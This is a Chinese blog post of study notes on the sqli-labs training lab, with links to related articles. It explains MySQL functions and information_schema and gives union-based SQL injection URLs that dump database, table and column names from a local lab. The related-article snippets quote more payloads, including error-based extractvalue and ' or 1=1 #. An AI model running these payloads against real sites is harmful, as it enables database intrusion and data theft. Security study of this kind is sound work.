Sqli-labs--学习笔记

最新推荐文章于 2024-05-02 16:43:37 发布
最新推荐文章于 2024-05-02 16:43:37 发布
阅读量346 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bt517840374/article/details/80328514
本文介绍了SQL注入中的常用函数,如concat和concat_ws用于连接字符串,user、database和version函数获取数据库信息。同时讲解了如何利用information_schema查询数据库、表及列的信息,并提供了具体的SQL语句示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

数据库的连接函数:concat和concat_ws;
concat_ws的第一个参数是连接字符串的分隔符。
user():返回当前数据库连接使用的用户
database():返回当前数据库连接使用的数据库
version():返回当前数据库的版本
127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,concat_ws(char(32,58,32),user(),database(),version())%23

系统数据库information_schema,记录当前数据库的数据库,表,列,用户权限等信息

SCHEMATA:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等

TABLES:储存mysql中的表信息,包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。

COLUMNS:存储mysql中表的列信息,包括这个表的所有列以及每个列的信息,该列是表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。

查询information_schema中的信息时,使用where语句值不能直接使用英文,要用单引号包裹着,十六进制也可以。

union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 1,1%23
查看表的字段
union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479
查看表

group_concat()函数
完整语法如下

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])
这个的意思应该就是将字段拼合在一起吧。
示例:http://127.0.0.1/sqli-labs/Less-2/?id=0%20union%20select%201,2,group_concat(char(32),table_name,char(32))%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479#
在sqli-labs第二关,将它们的表都爆了出来。

sqli-labs学习笔记(Less1-Less24)
极光时流
02-07 1299
sqli-labs学习笔记Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8 Less-1 select … from … where id=’$id’ 基于union联合查询 http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ 报错 http://127.0.0.1/sqli-labs-master/Le...
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs新手学习笔记(持续更新)
zydbk123456的博客
10-05 511
sqli-labs环境安装 下载地址:https://github.com/Audi-1/sqli-labs 同时需要安装phpstudy 开始前遇到的问题 启动phpstudy,发现apache服务可以正常启动,但MySQL就不行。但是打开任务管理器发现MySQL服务一直在正常运行。查了一下有这种问题原因,可能是因为之前已经安装了MySQL服务,需要在cmd 窗口下输入 sc delete m...
sqli-labs学习笔记
shayebudon的博客
10-06 1878
简单的SQL注入 选择:2017 A1 Extract Data-User info 在登录界面就可以使用SQL语句,以此来检查下平台是否搭建成功 用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。 可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行: 那么,选择在用户名输入处输入“‘ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对passwo...
sqli-labs学习笔记 DAY4
极客剑寮
02-23 188
sqli-labs学习笔记 DAY4 DAY 4 sqli-labs lesson 23 与lesson 1一样,只不过屏蔽了#和–注释符。 报错型注入: 爆库:id=99’ UNION SELECT 1,extractvalue(1,concat(0x7e,(database()),0x7e)),'3 爆表:?id=99...
sqli-labs学习笔记 DAY2
极客剑寮
02-18 318
DAY2 sqli-labs lesson 2 手工注入 URL:http://localhost/sqli-labs-master/Less-2/ Parameter:id 注入点检测:id=2;–+ 回显点检测:id=2+UNION+SELECT+1,2,3;–+ 字段数猜解:id=2+ORDER+BY+3;–+ 获取当前数据库:id=99+UNION+SELECT+1,database(...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
最新发布
2401_84254087的博客
05-02 179
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 794
继续学习sqli-labs,本篇是less17
sqli-labs学习笔记 DAY3
极客剑寮
02-19 221
sqli-labs学习笔记 DAY3 DAY 3 sqli-labs lesson 6 同lesson 5,只是把单引号改为双引号 sqli-labs lesson 7 同lesson 5,只是把单引号后面加两个空格,使用Burpsuit时,需要对结果进行匹配 这一关主要要学习的是sql种into outfile这个命令...
SQLI-LABS修炼笔记(一)
郁离歌丶的博客
03-03 1199
写在前面:作为一个萌新,想自己搭一个sqli-labs,中间历经了无数艰难,我win10系统用的是xampp,结果搭起来发现php版本太高了,xampp用的是php7以上的,然后自己用docker搭了一个,在ubantu用lamp搭了一个,又用phpstudy搭了一个,在自己服务器上弄了一个233333不说了进入正题。 less-11.找到注入点,发现报错回显。http://43.247.91.2...
sqli-labs笔记
weixin_64183637的博客
08-02 362
sqli-labs闯关记录
sqli-labs(全通关刷题笔记)
读万卷书,行万里路。
01-15 2756
文章目录1 准备工作2 基础挑战(1-20)less-1less-2less-3less-4less-5报错注入布尔注入延时注入less-6less-7less-8less-9less-10Hackbarless-11less-12less-14less-15less-16less-17less-18less-19less-203 高级注入(21-37)less-21less-22less-23less-24less-25less-26less-26aless-27less-27aless-28less-2
sqli-labs通关笔记
怪味巧克力的博客
05-19 575
文章目录Basic InjectionsLess-1 '字符型注入-联合查询Less-2 布尔注入-联合查询Less-3 字符注入-联合查询Less-4 字符注入-联合查询Less-5 字符注入-报错查询Less-6 字符注入-错误回显Less-7 文件读写Less-8 盲注和文件读写Less-9 盲注Less-10 盲注Less-11 单引号POST注入Less-12 双引号POST注入Less-13 双注入 - 字符型 - 变形Less-14 双注入 - 双引号 - 字符串Less-15 盲注/布尔
sqli-labs闯关笔记(Basic Injections)
末初 · mochu7
05-05 1353
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs Less-1 单引号报错注入GET 对传入的id参数单引号包裹,并且未作任何出参处理 对单引号闭合,联合查询注入即可 可以看下当传入payload是如何拼接闭合进行注入的 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,user(...
sqli-labs过关笔记(Page-1:1-22关)
1stPeak's Blog
03-23 2302
判断注入类型详解 (1)首先id=1肯定没错 http://127.0.0.1/?id=1 //正常 (2)加单引号 http://127.0.0.1/?id=1' //正常,很大几率不存在注入;不正常,存在注入 (3)判断数字型 http://127.0.0.1/?id=1 and 1=1//正常 http://127.0.0.1/?id=1 and 1=2//不正常 基本上可以确定是数字型...
sqli-labs闯关笔记
qq_41738909的博客
01-13 575
3.报错了典型的单引号注入,顺着单引号注入开干!3没报错有三列,4报错了证明有最多有3列。7.看到了username,password这俩就是目标了!id=1在后面加上',"判断是个啥注入方式。5.得到了数据库名字'security' 开始爆库。4. 查看一下他有哪些库和数据库版本。6.拿到了库名,开始爆表。1.打开页面观察一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值